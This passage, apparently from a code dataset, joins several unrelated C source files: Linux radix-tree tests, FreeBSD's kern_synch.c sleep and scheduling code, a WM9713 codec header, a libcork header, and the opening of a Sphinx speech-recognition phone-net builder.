	radix_tree_for_each_slot(slot, &tree, &iter, 0) {
		radix_tree_iter_replace(&tree, &iter, slot,
					item_create(iter.index, new_order));
	}
	radix_tree_preload_end();

	item_kill_tree(&tree);
	free(item);
}

/* Split an exceptional entry; replacing with items must zero the count. */
static void __multiorder_split2(int old_order, int new_order)
{
	RADIX_TREE(tree, GFP_KERNEL);
	void **slot;
	struct radix_tree_iter iter;
	struct radix_tree_node *node;
	void *item;

	__radix_tree_insert(&tree, 0, old_order, (void *)0x12);

	item = __radix_tree_lookup(&tree, 0, &node, NULL);
	assert(item == (void *)0x12);
	assert(node->exceptional > 0);

	radix_tree_split(&tree, 0, new_order);
	radix_tree_for_each_slot(slot, &tree, &iter, 0) {
		radix_tree_iter_replace(&tree, &iter, slot,
					item_create(iter.index, new_order));
	}

	item = __radix_tree_lookup(&tree, 0, &node, NULL);
	assert(item != (void *)0x12);
	assert(node->exceptional == 0);

	item_kill_tree(&tree);
}

/* Split an exceptional entry and replace with exceptional entries / NULLs. */
static void __multiorder_split3(int old_order, int new_order)
{
	RADIX_TREE(tree, GFP_KERNEL);
	void **slot;
	struct radix_tree_iter iter;
	struct radix_tree_node *node;
	void *item;

	__radix_tree_insert(&tree, 0, old_order, (void *)0x12);

	item = __radix_tree_lookup(&tree, 0, &node, NULL);
	assert(item == (void *)0x12);
	assert(node->exceptional > 0);

	radix_tree_split(&tree, 0, new_order);
	radix_tree_for_each_slot(slot, &tree, &iter, 0) {
		radix_tree_iter_replace(&tree, &iter, slot, (void *)0x16);
	}

	item = __radix_tree_lookup(&tree, 0, &node, NULL);
	assert(item == (void *)0x16);
	assert(node->exceptional > 0);

	item_kill_tree(&tree);

	__radix_tree_insert(&tree, 0, old_order, (void *)0x12);

	item = __radix_tree_lookup(&tree, 0, &node, NULL);
	assert(item == (void *)0x12);
	assert(node->exceptional > 0);

	radix_tree_split(&tree, 0, new_order);
	radix_tree_for_each_slot(slot, &tree, &iter, 0) {
		if (iter.index == (1 << new_order))
			radix_tree_iter_replace(&tree, &iter, slot,
						(void *)0x16);
		else
			radix_tree_iter_replace(&tree, &iter, slot, NULL);
	}

	item = __radix_tree_lookup(&tree, 1 << new_order, &node, NULL);
	assert(item == (void *)0x16);
	assert(node->count == node->exceptional);
	do {
		node = node->parent;
		if (!node)
			break;
		assert(node->count == 1);
		assert(node->exceptional == 0);
	} while (1);
	item_kill_tree(&tree);
}

/* Drive the split tests over all old/new order pairs. */
static void multiorder_split(void)
{
	int i, j;

	for (i = 3; i < 11; i++)
		for (j = 0; j < i; j++) {
			__multiorder_split(i, j);
			__multiorder_split2(i, j);
			__multiorder_split3(i, j);
		}
}

/* Exceptional-entry accounting around a multi-order entry. */
static void multiorder_account(void)
{
	RADIX_TREE(tree, GFP_KERNEL);
	struct radix_tree_node *node;
	void **slot;

	item_insert_order(&tree, 0, 5);

	__radix_tree_insert(&tree, 1 << 5, 5, (void *)0x12);
	__radix_tree_lookup(&tree, 0, &node, NULL);
	assert(node->count == node->exceptional * 2);
	radix_tree_delete(&tree, 1 << 5);
	assert(node->exceptional == 0);

	__radix_tree_insert(&tree, 1 << 5, 5, (void *)0x12);
	__radix_tree_lookup(&tree, 1 << 5, &node, &slot);
	assert(node->count == node->exceptional * 2);
	__radix_tree_replace(&tree, node, slot, NULL, NULL, NULL);
	assert(node->exceptional == 0);

	item_kill_tree(&tree);
}

/* Entry point for the whole multi-order test suite. */
void multiorder_checks(void)
{
	int i;

	for (i = 0; i < 20; i++) {
		multiorder_check(200, i);
		multiorder_check(0, i);
		multiorder_check((1UL << i) + 1, i);
	}

	for (i = 0; i < 15; i++)
		multiorder_shrink((1UL << (i + RADIX_TREE_MAP_SHIFT)), i);

	multiorder_insert_bug();
	multiorder_tag_tests();
	multiorder_iteration();
	multiorder_tagged_iteration();
	multiorder_join();
	multiorder_split();
	multiorder_account();

	radix_tree_cpu_dead(0);
}

/* Weak so a combined test binary can supply its own main(). */
int __weak main(void)
{
	radix_tree_init();
	multiorder_checks();
	return 0;
}
{ "language": "C" }
/*- * Copyright (c) 1982, 1986, 1990, 1991, 1993 * The Regents of the University of California. All rights reserved. * (c) UNIX System Laboratories, Inc. * All or some portions of this file are derived from material licensed * to the University of California by American Telephone and Telegraph * Co. or Unix System Laboratories, Inc. and are reproduced herein with * the permission of UNIX System Laboratories, Inc. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * 4. Neither the name of the University nor the names of its contributors * may be used to endorse or promote products derived from this software * without specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. 
 *
 *	@(#)kern_synch.c	8.9 (Berkeley) 5/19/95
 */

#include <sys/cdefs.h>
__FBSDID("$FreeBSD$");

#include "opt_ktrace.h"
#include "opt_sched.h"

#include <sys/param.h>
#include <sys/systm.h>
#include <sys/condvar.h>
#include <sys/kdb.h>
#include <sys/kernel.h>
#include <sys/ktr.h>
#include <sys/lock.h>
#include <sys/mutex.h>
#include <sys/proc.h>
#include <sys/resourcevar.h>
#include <sys/sched.h>
#include <sys/sdt.h>
#include <sys/signalvar.h>
#include <sys/sleepqueue.h>
#include <sys/smp.h>
#include <sys/sx.h>
#include <sys/sysctl.h>
#include <sys/sysproto.h>
#include <sys/vmmeter.h>
#ifdef KTRACE
#include <sys/uio.h>
#include <sys/ktrace.h>
#endif

#include <machine/cpu.h>

/* Human-readable name for the reason a thread is inhibited (for KTR). */
#define	KTDSTATE(td)							\
	(((td)->td_inhibitors & TDI_SLEEPING) != 0 ? "sleep"  :		\
	((td)->td_inhibitors & TDI_SUSPENDED) != 0 ? "suspended" :	\
	((td)->td_inhibitors & TDI_SWAPPED) != 0 ? "swapped" :		\
	((td)->td_inhibitors & TDI_LOCK) != 0  ? "blocked" :		\
	((td)->td_inhibitors & TDI_IWAIT) != 0  ? "iwait" : "yielding")

static void synch_setup(void *dummy);
SYSINIT(synch_setup, SI_SUB_KICK_SCHEDULER, SI_ORDER_FIRST, synch_setup,
    NULL);

int	hogticks;
/* One distinct wait channel per CPU so pause_sbt() sleeps can be told apart. */
static uint8_t pause_wchan[MAXCPU];

static struct callout loadav_callout;

struct loadavg averunnable =
	{ {0, 0, 0}, FSCALE };	/* load average, of runnable procs */
/*
 * Constants for averages over 1, 5, and 15 minutes
 * when sampling at 5 second intervals.
 */
static fixpt_t cexp[3] = {
	0.9200444146293232 * FSCALE,	/* exp(-1/12) */
	0.9834714538216174 * FSCALE,	/* exp(-1/60) */
	0.9944598480048967 * FSCALE,	/* exp(-1/180) */
};

/* kernel uses `FSCALE', userland (SHOULD) use kern.fscale */
SYSCTL_INT(_kern, OID_AUTO, fscale, CTLFLAG_RD, SYSCTL_NULL_INT_PTR, FSCALE, "");

static void	loadav(void *arg);

SDT_PROVIDER_DECLARE(sched);
SDT_PROBE_DEFINE(sched, , , preempt);

/* One-time initialization of the sleep-queue machinery and hogticks. */
static void
sleepinit(void *unused)
{

	hogticks = (hz / 10) * 2;	/* Default only. */
	init_sleepqueues();
}

/*
 * vmem tries to lock the sleepq mutexes when free'ing kva, so make sure
 * it is available.
 */
SYSINIT(sleepinit, SI_SUB_KMEM, SI_ORDER_ANY, sleepinit, 0);

/*
 * General sleep call.  Suspends the current thread until a wakeup is
 * performed on the specified identifier.  The thread will then be made
 * runnable with the specified priority.  Sleeps at most sbt units of time
 * (0 means no timeout).  If pri includes the PCATCH flag, let signals
 * interrupt the sleep, otherwise ignore them while sleeping.  Returns 0 if
 * awakened, EWOULDBLOCK if the timeout expires.  If PCATCH is set and a
 * signal becomes pending, ERESTART is returned if the current system
 * call should be restarted if possible, and EINTR is returned if the system
 * call should be interrupted by the signal (return EINTR).
 *
 * The lock argument is unlocked before the caller is suspended, and
 * re-locked before _sleep() returns.  If priority includes the PDROP
 * flag the lock is not re-locked before returning.
 */
int
_sleep(void *ident, struct lock_object *lock, int priority,
    const char *wmesg, sbintime_t sbt, sbintime_t pr, int flags)
{
	struct thread *td;
	struct proc *p;
	struct lock_class *class;
	uintptr_t lock_state;
	int catch, pri, rval, sleepq_flags;
	WITNESS_SAVE_DECL(lock_witness);

	td = curthread;
	p = td->td_proc;
#ifdef KTRACE
	if (KTRPOINT(td, KTR_CSW))
		ktrcsw(1, 0, wmesg);
#endif
	WITNESS_WARN(WARN_GIANTOK | WARN_SLEEPOK, lock, "Sleeping on \"%s\"",
	    wmesg);
	KASSERT(sbt != 0 || mtx_owned(&Giant) || lock != NULL,
	    ("sleeping without a lock"));
	KASSERT(p != NULL, ("msleep1"));
	KASSERT(ident != NULL && TD_IS_RUNNING(td), ("msleep"));
	if (priority & PDROP)
		KASSERT(lock != NULL && lock != &Giant.lock_object,
		    ("PDROP requires a non-Giant lock"));
	if (lock != NULL)
		class = LOCK_CLASS(lock);
	else
		class = NULL;

	if (SCHEDULER_STOPPED()) {
		/* Post-panic: honour PDROP but do not actually sleep. */
		if (lock != NULL && priority & PDROP)
			class->lc_unlock(lock);
		return (0);
	}
	catch = priority & PCATCH;
	pri = priority & PRIMASK;

	/*
	 * If we are already on a sleep queue, then remove us from that
	 * sleep queue first.  We have to do this to handle recursive
	 * sleeps.
	 */
	if (TD_ON_SLEEPQ(td))
		sleepq_remove(td, td->td_wchan);

	/* A wait channel inside pause_wchan[] means this is a pause(9) sleep. */
	if ((uint8_t *)ident >= &pause_wchan[0] &&
	    (uint8_t *)ident <= &pause_wchan[MAXCPU - 1])
		sleepq_flags = SLEEPQ_PAUSE;
	else
		sleepq_flags = SLEEPQ_SLEEP;
	if (catch)
		sleepq_flags |= SLEEPQ_INTERRUPTIBLE;

	sleepq_lock(ident);
	CTR5(KTR_PROC, "sleep: thread %ld (pid %ld, %s) on %s (%p)",
	    td->td_tid, p->p_pid, td->td_name, wmesg, ident);

	if (lock == &Giant.lock_object)
		mtx_assert(&Giant, MA_OWNED);
	DROP_GIANT();
	/* Sleepable locks are released later, after sleepq_add() below. */
	if (lock != NULL && lock != &Giant.lock_object &&
	    !(class->lc_flags & LC_SLEEPABLE)) {
		WITNESS_SAVE(lock, lock_witness);
		lock_state = class->lc_unlock(lock);
	} else
		/* GCC needs to follow the Yellow Brick Road */
		lock_state = -1;

	/*
	 * We put ourselves on the sleep queue and start our timeout
	 * before calling thread_suspend_check, as we could stop there,
	 * and a wakeup or a SIGCONT (or both) could occur while we were
	 * stopped without resuming us.  Thus, we must be ready for sleep
	 * when cursig() is called.  If the wakeup happens while we're
	 * stopped, then td will no longer be on a sleep queue upon
	 * return from cursig().
	 */
	sleepq_add(ident, lock, wmesg, sleepq_flags, 0);
	if (sbt != 0)
		sleepq_set_timeout_sbt(ident, sbt, pr, flags);
	if (lock != NULL && class->lc_flags & LC_SLEEPABLE) {
		/* Sleepable lock: only drop it once we are queued. */
		sleepq_release(ident);
		WITNESS_SAVE(lock, lock_witness);
		lock_state = class->lc_unlock(lock);
		sleepq_lock(ident);
	}
	/* Pick the wait primitive matching (timeout?, catch signals?). */
	if (sbt != 0 && catch)
		rval = sleepq_timedwait_sig(ident, pri);
	else if (sbt != 0)
		rval = sleepq_timedwait(ident, pri);
	else if (catch)
		rval = sleepq_wait_sig(ident, pri);
	else {
		sleepq_wait(ident, pri);
		rval = 0;
	}
#ifdef KTRACE
	if (KTRPOINT(td, KTR_CSW))
		ktrcsw(0, 0, wmesg);
#endif
	PICKUP_GIANT();
	if (lock != NULL && lock != &Giant.lock_object && !(priority & PDROP)) {
		class->lc_lock(lock, lock_state);
		WITNESS_RESTORE(lock, lock_witness);
	}
	return (rval);
}

/*
 * Sleep variant for callers holding a spin mutex; the mutex is dropped
 * for the duration of the sleep and reacquired before returning.
 */
int
msleep_spin_sbt(void *ident, struct mtx *mtx, const char *wmesg,
    sbintime_t sbt, sbintime_t pr, int flags)
{
	struct thread *td;
	struct proc *p;
	int rval;
	WITNESS_SAVE_DECL(mtx);

	td = curthread;
	p = td->td_proc;
	KASSERT(mtx != NULL, ("sleeping without a mutex"));
	KASSERT(p != NULL, ("msleep1"));
	KASSERT(ident != NULL && TD_IS_RUNNING(td), ("msleep"));

	if (SCHEDULER_STOPPED())
		return (0);

	sleepq_lock(ident);
	CTR5(KTR_PROC, "msleep_spin: thread %ld (pid %ld, %s) on %s (%p)",
	    td->td_tid, p->p_pid, td->td_name, wmesg, ident);

	DROP_GIANT();
	mtx_assert(mtx, MA_OWNED | MA_NOTRECURSED);
	WITNESS_SAVE(&mtx->lock_object, mtx);
	mtx_unlock_spin(mtx);

	/*
	 * We put ourselves on the sleep queue and start our timeout.
	 */
	sleepq_add(ident, &mtx->lock_object, wmesg, SLEEPQ_SLEEP, 0);
	if (sbt != 0)
		sleepq_set_timeout_sbt(ident, sbt, pr, flags);

	/*
	 * Can't call ktrace with any spin locks held so it can lock the
	 * ktrace_mtx lock, and WITNESS_WARN considers it an error to hold
	 * any spin lock.  Thus, we have to drop the sleepq spin lock while
	 * we handle those requests.  This is safe since we have placed our
	 * thread on the sleep queue already.
	 */
#ifdef KTRACE
	if (KTRPOINT(td, KTR_CSW)) {
		sleepq_release(ident);
		ktrcsw(1, 0, wmesg);
		sleepq_lock(ident);
	}
#endif
#ifdef WITNESS
	sleepq_release(ident);
	WITNESS_WARN(WARN_GIANTOK | WARN_SLEEPOK, NULL, "Sleeping on \"%s\"",
	    wmesg);
	sleepq_lock(ident);
#endif
	if (sbt != 0)
		rval = sleepq_timedwait(ident, 0);
	else {
		sleepq_wait(ident, 0);
		rval = 0;
	}
#ifdef KTRACE
	if (KTRPOINT(td, KTR_CSW))
		ktrcsw(0, 0, wmesg);
#endif
	PICKUP_GIANT();
	mtx_lock_spin(mtx);
	WITNESS_RESTORE(&mtx->lock_object, mtx);
	return (rval);
}

/*
 * pause() delays the calling thread by the given number of system ticks.
 * During cold bootup, pause() uses the DELAY() function instead of
 * the tsleep() function to do the waiting.  The "timo" argument must be
 * greater than or equal to zero.  A "timo" value of zero is equivalent
 * to a "timo" value of one.
 */
int
pause_sbt(const char *wmesg, sbintime_t sbt, sbintime_t pr, int flags)
{
	KASSERT(sbt >= 0, ("pause: timeout must be >= 0"));

	/* silently convert invalid timeouts */
	if (sbt == 0)
		sbt = tick_sbt;

	if (cold || kdb_active || SCHEDULER_STOPPED()) {
		/*
		 * We delay one second at a time to avoid overflowing the
		 * system specific DELAY() function(s):
		 */
		while (sbt >= SBT_1S) {
			DELAY(1000000);
			sbt -= SBT_1S;
		}
		/* Do the delay remainder, if any */
		sbt = howmany(sbt, SBT_1US);
		if (sbt > 0)
			DELAY(sbt);
		return (0);
	}
	/* Per-CPU wait channel marks this as a pause(9) sleep for _sleep(). */
	return (_sleep(&pause_wchan[curcpu], NULL, 0, wmesg, sbt, pr, flags));
}

/*
 * Make all threads sleeping on the specified identifier runnable.
 */
void
wakeup(void *ident)
{
	int wakeup_swapper;

	sleepq_lock(ident);
	wakeup_swapper = sleepq_broadcast(ident, SLEEPQ_SLEEP, 0, 0);
	sleepq_release(ident);
	if (wakeup_swapper) {
		KASSERT(ident != &proc0,
		    ("wakeup and wakeup_swapper and proc0"));
		kick_proc0();
	}
}

/*
 * Make a thread sleeping on the specified identifier runnable.
 * May wake more than one thread if a target thread is currently
 * swapped out.
 */
void
wakeup_one(void *ident)
{
	int wakeup_swapper;

	sleepq_lock(ident);
	wakeup_swapper = sleepq_signal(ident, SLEEPQ_SLEEP, 0, 0);
	sleepq_release(ident);
	if (wakeup_swapper)
		kick_proc0();
}

/* Hand control back to the kernel debugger; never returns normally. */
static void
kdb_switch(void)
{
	thread_unlock(curthread);
	kdb_backtrace();
	kdb_reenter();
	panic("%s: did not reenter debugger", __func__);
}

/*
 * The machine independent parts of context switching.
 */
void
mi_switch(int flags, struct thread *newtd)
{
	uint64_t runtime, new_switchtime;
	struct thread *td;

	td = curthread;			/* XXX */
	THREAD_LOCK_ASSERT(td, MA_OWNED | MA_NOTRECURSED);
	KASSERT(!TD_ON_RUNQ(td), ("mi_switch: called by old code"));
#ifdef INVARIANTS
	if (!TD_ON_LOCK(td) && !TD_IS_RUNNING(td))
		mtx_assert(&Giant, MA_NOTOWNED);
#endif
	KASSERT(td->td_critnest == 1 || panicstr,
	    ("mi_switch: switch in a critical section"));
	KASSERT((flags & (SW_INVOL | SW_VOL)) != 0,
	    ("mi_switch: switch must be voluntary or involuntary"));
	KASSERT(newtd != curthread, ("mi_switch: preempting back to ourself"));

	/*
	 * Don't perform context switches from the debugger.
	 */
	if (kdb_active)
		kdb_switch();
	if (SCHEDULER_STOPPED())
		return;
	/* Account the switch as voluntary or involuntary. */
	if (flags & SW_VOL) {
		td->td_ru.ru_nvcsw++;
		td->td_swvoltick = ticks;
	} else {
		td->td_ru.ru_nivcsw++;
		td->td_swinvoltick = ticks;
	}
#ifdef SCHED_STATS
	SCHED_STAT_INC(sched_switch_stats[flags & SW_TYPE_MASK]);
#endif
	/*
	 * Compute the amount of time during which the current
	 * thread was running, and add that to its total so far.
	 */
	new_switchtime = cpu_ticks();
	runtime = new_switchtime - PCPU_GET(switchtime);
	td->td_runtime += runtime;
	td->td_incruntime += runtime;
	PCPU_SET(switchtime, new_switchtime);
	td->td_generation++;	/* bump preempt-detect counter */
	PCPU_INC(cnt.v_swtch);
	PCPU_SET(switchticks, ticks);
	CTR4(KTR_PROC, "mi_switch: old thread %ld (td_sched %p, pid %ld, %s)",
	    td->td_tid, td_get_sched(td), td->td_proc->p_pid, td->td_name);
#if (KTR_COMPILE & KTR_SCHED) != 0
	if (TD_IS_IDLETHREAD(td))
		KTR_STATE1(KTR_SCHED, "thread", sched_tdname(td), "idle",
		    "prio:%d", td->td_priority);
	else
		KTR_STATE3(KTR_SCHED, "thread", sched_tdname(td), KTDSTATE(td),
		    "prio:%d", td->td_priority, "wmesg:\"%s\"", td->td_wmesg,
		    "lockname:\"%s\"", td->td_lockname);
#endif
	SDT_PROBE0(sched, , , preempt);
	/* The scheduler performs the actual switch; we resume here later. */
	sched_switch(td, newtd, flags);
	KTR_STATE1(KTR_SCHED, "thread", sched_tdname(td), "running",
	    "prio:%d", td->td_priority);
	CTR4(KTR_PROC, "mi_switch: new thread %ld (td_sched %p, pid %ld, %s)",
	    td->td_tid, td_get_sched(td), td->td_proc->p_pid, td->td_name);

	/*
	 * If the last thread was exiting, finish cleaning it up.
	 */
	if ((td = PCPU_GET(deadthread))) {
		PCPU_SET(deadthread, NULL);
		thread_stash(td);
	}
}

/*
 * Change thread state to be runnable, placing it on the run queue if
 * it is in memory.  If it is swapped out, return true so our caller
 * will know to awaken the swapper.
 */
int
setrunnable(struct thread *td)
{

	THREAD_LOCK_ASSERT(td, MA_OWNED);
	KASSERT(td->td_proc->p_state != PRS_ZOMBIE,
	    ("setrunnable: pid %d is a zombie", td->td_proc->p_pid));
	switch (td->td_state) {
	case TDS_RUNNING:
	case TDS_RUNQ:
		return (0);
	case TDS_INHIBITED:
		/*
		 * If we are only inhibited because we are swapped out
		 * then arange to swap in this process.  Otherwise just return.
		 */
		if (td->td_inhibitors != TDI_SWAPPED)
			return (0);
		/* FALLTHROUGH */
	case TDS_CAN_RUN:
		break;
	default:
		printf("state is 0x%x", td->td_state);
		panic("setrunnable(2)");
	}
	if ((td->td_flags & TDF_INMEM) == 0) {
		/* Swapped out: request a swap-in and tell caller to kick proc0. */
		if ((td->td_flags & TDF_SWAPINREQ) == 0) {
			td->td_flags |= TDF_SWAPINREQ;
			return (1);
		}
	} else
		sched_wakeup(td);
	return (0);
}

/*
 * Compute a tenex style load average of a quantity on
 * 1, 5 and 15 minute intervals.
 */
static void
loadav(void *arg)
{
	int i, nrun;
	struct loadavg *avg;

	nrun = sched_load();
	avg = &averunnable;

	/* Exponential decay toward the current run-queue length. */
	for (i = 0; i < 3; i++)
		avg->ldavg[i] = (cexp[i] * avg->ldavg[i] +
		    nrun * FSCALE * (FSCALE - cexp[i])) >> FSHIFT;

	/*
	 * Schedule the next update to occur after 5 seconds, but add a
	 * random variation to avoid synchronisation with processes that
	 * run at regular intervals.
	 */
	callout_reset_sbt(&loadav_callout,
	    SBT_1US * (4000000 + (int)(random() % 2000001)), SBT_1US,
	    loadav, NULL, C_DIRECT_EXEC | C_PREL(32));
}

/* ARGSUSED */
static void
synch_setup(void *dummy)
{
	callout_init(&loadav_callout, 1);

	/* Kick off timeout driven events by calling first time. */
	loadav(NULL);
}

/* True once this thread has run long enough to be considered a CPU hog. */
int
should_yield(void)
{

	return ((u_int)ticks - (u_int)curthread->td_swvoltick >= hogticks);
}

void
maybe_yield(void)
{

	if (should_yield())
		kern_yield(PRI_USER);
}

/* Voluntarily relinquish the CPU, optionally adjusting priority first. */
void
kern_yield(int prio)
{
	struct thread *td;

	td = curthread;
	DROP_GIANT();
	thread_lock(td);
	if (prio == PRI_USER)
		prio = td->td_user_pri;
	if (prio >= 0)
		sched_prio(td, prio);
	mi_switch(SW_VOL | SWT_RELINQUISH, NULL);
	thread_unlock(td);
	PICKUP_GIANT();
}

/*
 * General purpose yield system call.
 */
int
sys_yield(struct thread *td, struct yield_args *uap)
{

	thread_lock(td);
	if (PRI_BASE(td->td_pri_class) == PRI_TIMESHARE)
		sched_prio(td, PRI_MAX_TIMESHARE);
	mi_switch(SW_VOL | SWT_RELINQUISH, NULL);
	thread_unlock(td);
	td->td_retval[0] = 0;
	return (0);
}
{ "language": "C" }
/* SPDX-License-Identifier: GPL-2.0 */
/*
 * wm9713.h  --  WM9713 Soc Audio driver
 */

#ifndef _WM9713_H
#define _WM9713_H

/* clock inputs */
#define WM9713_CLKA_PIN			0
#define WM9713_CLKB_PIN			1

/* clock divider ID's */
#define WM9713_PCMCLK_DIV		0
#define WM9713_CLKA_MULT		1
#define WM9713_CLKB_MULT		2
#define WM9713_HIFI_DIV			3
#define WM9713_PCMBCLK_DIV		4
#define WM9713_PCMCLK_PLL_DIV		5
#define WM9713_HIFI_PLL_DIV		6

/*
 * Calculate the appropriate bit mask for the external PCM clock divider.
 * The argument is fully parenthesised so that a compound expression such
 * as WM9713_PCMDIV(1 << 2) expands with the intended precedence (the
 * previous expansion `((x - 1) << 8)` bound `- 1` inside the argument).
 */
#define WM9713_PCMDIV(x)	(((x) - 1) << 8)

/*
 * Calculate the appropriate bit mask for the external HiFi clock divider.
 * Argument parenthesised for the same reason as WM9713_PCMDIV().
 */
#define WM9713_HIFIDIV(x)	(((x) - 1) << 12)

/* MCLK clock mulitipliers */
#define WM9713_CLKA_X1		(0 << 1)
#define WM9713_CLKA_X2		(1 << 1)
#define WM9713_CLKB_X1		(0 << 2)
#define WM9713_CLKB_X2		(1 << 2)

/* MCLK clock MUX */
#define WM9713_CLK_MUX_A	(0 << 0)
#define WM9713_CLK_MUX_B	(1 << 0)

/* Voice DAI BCLK divider */
#define WM9713_PCMBCLK_DIV_1	(0 << 9)
#define WM9713_PCMBCLK_DIV_2	(1 << 9)
#define WM9713_PCMBCLK_DIV_4	(2 << 9)
#define WM9713_PCMBCLK_DIV_8	(3 << 9)
#define WM9713_PCMBCLK_DIV_16	(4 << 9)

#endif
{ "language": "C" }
/* -*- coding: utf-8 -*-
 * ----------------------------------------------------------------------
 * Copyright © 2012, RedJack, LLC.
 * All rights reserved.
 *
 * Please see the COPYING file in this distribution for license
 * details.
 * ----------------------------------------------------------------------
 */

#ifndef LIBCORK_CLI_H
#define LIBCORK_CLI_H

/*** include all of the parts ***/
/* Umbrella header: pulls the entire libcork CLI API into one include. */

#include <libcork/cli/commands.h>

#endif /* LIBCORK_CLI_H */
{ "language": "C" }
/* ==================================================================== * Copyright (c) 1996-2000 Carnegie Mellon University. All rights * reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in * the documentation and/or other materials provided with the * distribution. * * 3. The names "Sphinx" and "Carnegie Mellon" must not be used to * endorse or promote products derived from this software without * prior written permission. To obtain permission, contact * sphinx@cs.cmu.edu. * * 4. Products derived from this software may not be called "Sphinx" * nor may "Sphinx" appear in their names without prior written * permission of Carnegie Mellon University. To obtain permission, * contact sphinx@cs.cmu.edu. * * 5. Redistributions of any form whatsoever must retain the following * acknowledgment: * "This product includes software developed by Carnegie * Mellon University (http://www.speech.cs.cmu.edu/)." * * THIS SOFTWARE IS PROVIDED BY CARNEGIE MELLON UNIVERSITY ``AS IS'' AND * ANY EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, * THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR * PURPOSE ARE DISCLAIMED. 
IN NO EVENT SHALL CARNEGIE MELLON UNIVERSITY
 * NOR ITS EMPLOYEES BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
 * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
 * LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
 * DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
 * THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
 * (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
 * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
 *
 * ====================================================================
 *
 */
/*
 * wnet2pnet.c -- Build a triphone HMM net from a given word net.
 *
 *
 * HISTORY
 *
 * 05-Nov-1997	M K Ravishankar (rkm@cs.cmu.edu) at Carnegie Mellon University
 * 		Started.
 */

#include <libutil/libutil.h>
#include <libmisc/libmisc.h>

#include "senone.h"
#include "wnet2pnet.h"

/* Module-wide accumulator state for the phone net under construction. */
static glist_t pnet;
static int32 n_pnode, n_plink;

/*
 * Additional data needed at each word node to build the phone net.
 */
typedef struct wnode_data_s {
    wnode_t *wnode;
    glist_t *lc;	/* lc[p] = list of initial pnode_t with left context = p */
    glist_t *rc;	/* rc[p] = list of final pnode_t with right context = p */
} wnode_data_t;

/* Create a directed link src -> dst and bump the global link count. */
static void link_pnodes (pnode_t *src, pnode_t *dst)
{
    plink_t *pl;

    pl = (plink_t *) mymalloc (sizeof(plink_t));
    pl->dst = dst;
    src->succ = glist_add_ptr (src->succ, (void *)pl);

    n_plink++;
}

/* Return the existing link src -> dst, or NULL if none (linear scan). */
static plink_t *plink_lookup (pnode_t *src, pnode_t *dst)
{
    gnode_t *gn;
    plink_t *pl;

    for (gn = src->succ; gn; gn = gn->next) {
	pl = (plink_t *) gnode_ptr(gn);
	if (pl->dst == dst)
	    return pl;
    }
    return NULL;
}

/*
 * Lookup the list of pnodes for an HMM with the same underlying model as the given
 * pid.  Return pointer if found, NULL otherwise.
 */
static pnode_t *plist_lookup_hmm (mdef_t *mdef, glist_t plist, s3pid_t pid)
{
    gnode_t *gn;
    pnode_t *pn;

    for (gn = plist; gn; gn = gnode_next(gn)) {
	pn = (pnode_t *) gnode_ptr(gn);
	if (mdef_hmm_cmp (mdef, pn->hmm.pid, pid) == 0)
	    return pn;
    }
    return NULL;
}

/* Allocate a pnode for (pid, wid, pos), register it on the global pnet list. */
static pnode_t *pnode_create (mdef_t *mdef, s3pid_t pid, s3wid_t wid, int32 pos)
{
    pnode_t *pn;

    pn = (pnode_t *) mymalloc (sizeof(pnode_t));
    pn->wid = wid;
    pn->pos = pos;
    pn->hmm.state = (hmm_state_t *) ckd_calloc (mdef->n_emit_state, sizeof(hmm_state_t));
    pn->hmm.pid = pid;
    pn->succ = NULL;

    pnet = glist_add_ptr (pnet, (void *) pn);
    n_pnode++;

    return pn;
}

/*
 * Build HMM net for the given word.  All the internal links are set up.  But the net
 * is isolated, with no connections to any other word.  However, wnode_data->{lc,rc}
 * are updated with the HMMs at the extreme ends (left and right) so that one can later
 * complete the entire net.
 */
static void wnode2pnet_build (mdef_t *mdef, dict_t *dict, wnode_data_t *wnode_data)
{
    uint8 *lc, *rc;		/* flags: CI phone p is a possible left/right context */
    wnode_t *wn;
    gnode_t *gn, *gn2;
    wlink_t *wl;
    s3wid_t wid;
    s3pid_t pid;
    s3cipid_t ci, l, r;
    int32 pronlen;
    int32 i, j;
    glist_t p1list, p2list;
    pnode_t *pn, *prevpn;

    wn = wnode_data->wnode;

    /* Mark all the left and right context for this word node */
    lc = (uint8 *) ckd_calloc (mdef->n_ciphone, sizeof(uint8));
    rc = (uint8 *) ckd_calloc (mdef->n_ciphone, sizeof(uint8));
